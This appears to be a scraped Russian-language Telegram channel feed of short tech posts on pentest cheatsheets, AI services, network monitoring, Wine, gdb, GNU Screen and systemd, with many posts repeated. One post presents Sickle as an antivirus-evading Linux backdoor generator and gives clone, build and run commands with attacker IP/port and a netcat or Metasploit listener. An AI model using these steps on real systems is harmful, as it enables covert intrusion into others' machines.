MobileApp-Pentest-Cheatsheet — шпаргалка для тестирования мобильных приложений на проникновение!
Она включает краткий, но информативный набор рекомендаций, инструментов и техник для анализа безопасности Android и iOS приложений. Контент организован по категориям, включая реверс-инжиниринг, статический и динамический анализ, сетевой анализ, обход механизмов безопасности (например, root detection и SSL pinning), а также серверное тестирование.
Ссылка тут
Она включает краткий, но информативный набор рекомендаций, инструментов и техник для анализа безопасности Android и iOS приложений. Контент организован по категориям, включая реверс-инжиниринг, статический и динамический анализ, сетевой анализ, обход механизмов безопасности (например, root detection и SSL pinning), а также серверное тестирование.
Ссылка тут
👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Нейросервис для генерации мобильных приложений.
Trace с базой ИИ может сгенерировать любое простое приложение из текстового промта. Результат можно экспортировать и использовать в своих целях.
Trace с базой ИИ может сгенерировать любое простое приложение из текстового промта. Результат можно экспортировать и использовать в своих целях.
👍5
Followr - инструмент управления соц. сетями с помощью ИИ
Сервис автоматизирует планирование, создание контента и расширенную аналитику для оптимизации вашей стратегии в социальных сетях.
С помощью Followr вы можете легко создавать привлекательный контент, отслеживать свою аналитику в режиме реального времени и использовать данные для стимулирования роста и инноваций.
Сервис автоматизирует планирование, создание контента и расширенную аналитику для оптимизации вашей стратегии в социальных сетях.
С помощью Followr вы можете легко создавать привлекательный контент, отслеживать свою аналитику в режиме реального времени и использовать данные для стимулирования роста и инноваций.
😁1
This media is not supported in your browser
VIEW IN TELEGRAM
NetAlertX — это инструмент для мониторинга сетей и обнаружения неизвестных устройств!
Он сканирует подключённые к сети устройства, уведомляя пользователей о появлении новых или подозрительных подключений. Это полезно для защиты локальной сети от возможных вторжений или несанкционированного доступа. NetAlertX поддерживает автоматическое сканирование по расписанию и может интегрироваться с популярными инструментами, такими как Pi-hole и Unifi Controller.
Ссылка Github
Он сканирует подключённые к сети устройства, уведомляя пользователей о появлении новых или подозрительных подключений. Это полезно для защиты локальной сети от возможных вторжений или несанкционированного доступа. NetAlertX поддерживает автоматическое сканирование по расписанию и может интегрироваться с популярными инструментами, такими как Pi-hole и Unifi Controller.
Ссылка Github
👍1😎1
This media is not supported in your browser
VIEW IN TELEGRAM
Сервис GeoSpy AI научился вычислять локацию по фотографии ориентируется на вид из окна — сверяя изображение с картами и базами данных.
Пока сервис не раздают кому попало, но истории мы знаем: сначала «ограниченный доступ», потом утечки, затем массовый инструмент.
Вопрос в том, как быстро подобные алгоритмы станут нормой.
Пока сервис не раздают кому попало, но истории мы знаем: сначала «ограниченный доступ», потом утечки, затем массовый инструмент.
Вопрос в том, как быстро подобные алгоритмы станут нормой.
👍3
Sickle: генератор бэкдоров для Linux
1. Установите зависимости:
2. Клонируйте репозиторий:
3. Скомпилируйте:
Использование:
1. Запустите генерацию бэкдора:
2. Запустите обработчик на стороне атакующего, используя netcat или Metasploit.
Sickle — это инструмент для создания вредоносных ELF-бэкдоров, обходящих антивирусные решения. Позволяет встраивать полезную нагрузку в исполняемые файлы.Установка:
1. Установите зависимости:
sudo apt install golang
2. Клонируйте репозиторий:
git clone https://github.com/wetw0rk/Sickle.git && cd Sickle
3. Скомпилируйте:
go build Sickle.go
Использование:
1. Запустите генерацию бэкдора:
./Sickle -H <IP> -P <PORT> -F <TARGET_FILE>
2. Запустите обработчик на стороне атакующего, используя netcat или Metasploit.
Использование Wine для установки драйверов Windows в Linux
Wine (Wine Is Not an Emulator) — инструмент для запуска приложений Windows на Linux, но его использование для установки драйверов Windows требует осторожности. Драйверы Windows обычно не работают нативно в Linux из-за различий между архитектурами ядра. Тем не менее, в некоторых случаях Wine может помочь, особенно если драйвер нужен для специфического оборудования, для которого нет нативной поддержки в Linux.
Как использовать Wine для установки драйверов Windows
1. Убедитесь, что Wine установлен:
Проверьте версию:
2. Создайте новую Wine-префикс:
Это создаст изолированное окружение для установки драйвера.
3. Скачайте драйвер для Windows:
Найдите подходящую версию драйвера на сайте производителя.
4. Запустите установочный файл через Wine:
Следуйте инструкциям установщика.
После установки драйвера через Wine приложение, связанное с устройством, может быть запущено из этого же Wine-префикса. Например, драйвер может установить необходимое программное обеспечение для управления устройством.
5. Убедитесь, что устройство подключено и распознается Linux:
Wine (Wine Is Not an Emulator) — инструмент для запуска приложений Windows на Linux, но его использование для установки драйверов Windows требует осторожности. Драйверы Windows обычно не работают нативно в Linux из-за различий между архитектурами ядра. Тем не менее, в некоторых случаях Wine может помочь, особенно если драйвер нужен для специфического оборудования, для которого нет нативной поддержки в Linux.
Как использовать Wine для установки драйверов Windows
1. Убедитесь, что Wine установлен:
sudo apt install wine # Для Ubuntu/Debian
Проверьте версию:
wine --version2. Создайте новую Wine-префикс:
WINEPREFIX=~/wine-driver winecfg
Это создаст изолированное окружение для установки драйвера.
3. Скачайте драйвер для Windows:
Найдите подходящую версию драйвера на сайте производителя.
4. Запустите установочный файл через Wine:
WINEPREFIX=~/wine-driver wine setup.exe
Следуйте инструкциям установщика.
После установки драйвера через Wine приложение, связанное с устройством, может быть запущено из этого же Wine-префикса. Например, драйвер может установить необходимое программное обеспечение для управления устройством.
5. Убедитесь, что устройство подключено и распознается Linux:
lsusb # Для USB-устройств
dmesg | grep -i device # Лог ядра для подключенного оборудования
👍7👎2
Утилита glxinfo
glxinfo — утилита командной строки, которая предоставляет информацию о реализации OpenGL и состоянии графического стека через интерфейс GLX (OpenGL Extension to the X Window System).
Примеры использования:
1. Получить основные данные о OpenGL:
Вывод покажет:
- Версию OpenGL.
- Имя рендера (например, Mesa, NVIDIA, AMD).
- Поддерживаемые функции (GLSL и т.д.).
2. Показать все доступные расширения OpenGL:
3. Вывод всей информации:
glxinfo — утилита командной строки, которая предоставляет информацию о реализации OpenGL и состоянии графического стека через интерфейс GLX (OpenGL Extension to the X Window System).
Примеры использования:
1. Получить основные данные о OpenGL:
glxinfo | grep OpenGL
Вывод покажет:
- Версию OpenGL.
- Имя рендера (например, Mesa, NVIDIA, AMD).
- Поддерживаемые функции (GLSL и т.д.).
2. Показать все доступные расширения OpenGL:
glxinfo | grep "extensions"
3. Вывод всей информации:
glxinfo
🤡2
Whonix – это дистрибутив Linux, который использует виртуальные машины для изоляции вашей реальной системы от интернета, пропуская весь трафик через сеть Tor.
Преимущества Whonix:
— Полная анонимность: Даже если злоумышленник получит доступ к рабочей станции, реальный IP останется скрытым.
— Встроенные инструменты: В систему уже включены приложения для безопасного серфинга, обмена сообщениями и работы с документами.
Please open Telegram to view this post
VIEW IN TELEGRAM
🤡7👍3🔥2
CTF Search — это поисковая система, предназначенная для поиска и изучения решений и описаний задач формата Capture The Flag (CTF)!
Она содержит более 26 000 записей, охватывающих различные категории, такие как веб-эксплуатация, переполнение буфера и реверс-инжиниринг.
Ссылка
Она содержит более 26 000 записей, охватывающих различные категории, такие как веб-эксплуатация, переполнение буфера и реверс-инжиниринг.
Ссылка
❤2
Как пользоваться gdb (GNU Debugger)?
1. Убедитесь, что у вас установлен
2. Запустите программу, которую хотите отладить:
3. Запустите
4. Отладка начнется после выполнения предыдущей команды. Вы можете использовать следующие команды для управления отладкой:
-
-
-
-
-
-
1. Убедитесь, что у вас установлен
gdb. Если нет, выполните в терминале команду:sudo apt-get install gdb2. Запустите программу, которую хотите отладить:
./myprogram3. Запустите
gdb и подключитесь к запущенной программе. Для этого выполните команду:gdb myprogram4. Отладка начнется после выполнения предыдущей команды. Вы можете использовать следующие команды для управления отладкой:
-
break <номер строки> - устанавливает точку останова на указанной строке-
run - запускает программу-
next - переходит к следующей строке кода-
step - переходит к следующей строке кода или входит внутрь функции-
print <имя переменной> - печатает значение переменной-
quit - завершает отладку👍4
GNU Screen
GNU Screen - консольное приложение, которое позволяет выполнять несколько задач в рамках одной консоли и управлять ими даже в случае отключения от сервера SSH или просто закрытия терминала.
Чтобы установить GNU Screen в Ubuntu:
После установки вы можете запустить GNU Screen, вызвав команду "
-
-
-
-
-
-
GNU Screen - консольное приложение, которое позволяет выполнять несколько задач в рамках одной консоли и управлять ими даже в случае отключения от сервера SSH или просто закрытия терминала.
Чтобы установить GNU Screen в Ubuntu:
sudo apt-get install screenПосле установки вы можете запустить GNU Screen, вызвав команду "
screen". Обычно вы будете работать с GNU Screen следующим образом:-
screen - создать новую сессию-
Ctrl-a c - создать новое окно внутри текущей сессии-
Ctrl-a n - переключиться на следующее окно в текущей сессии-
Ctrl-a p - переключиться на предыдущее окно в текущей сессии-
Ctrl-a d - отключиться от текущей сессии, но оставить ее работающей в фоновом режиме-
screen -r - перейти обратно к существующей сессииСистемные службы и systemd
systemd — система инициализации и менеджер служб, который управляет запуском и остановкой служб в Linux. Он заменяет более старые системы, такие как SysVinit.
Пример:
Чтобы проверить статус службы, например, nginx, используем: systemctl status nginx
Чтобы запустить или остановить службу:
Чтобы настроить службу на автоматический запуск при загрузке системы:
systemd — система инициализации и менеджер служб, который управляет запуском и остановкой служб в Linux. Он заменяет более старые системы, такие как SysVinit.
Пример:
Чтобы проверить статус службы, например, nginx, используем: systemctl status nginx
Чтобы запустить или остановить службу:
sudo systemctl start nginx
sudo systemctl stop nginxЧтобы настроить службу на автоматический запуск при загрузке системы:
sudo systemctl enable nginx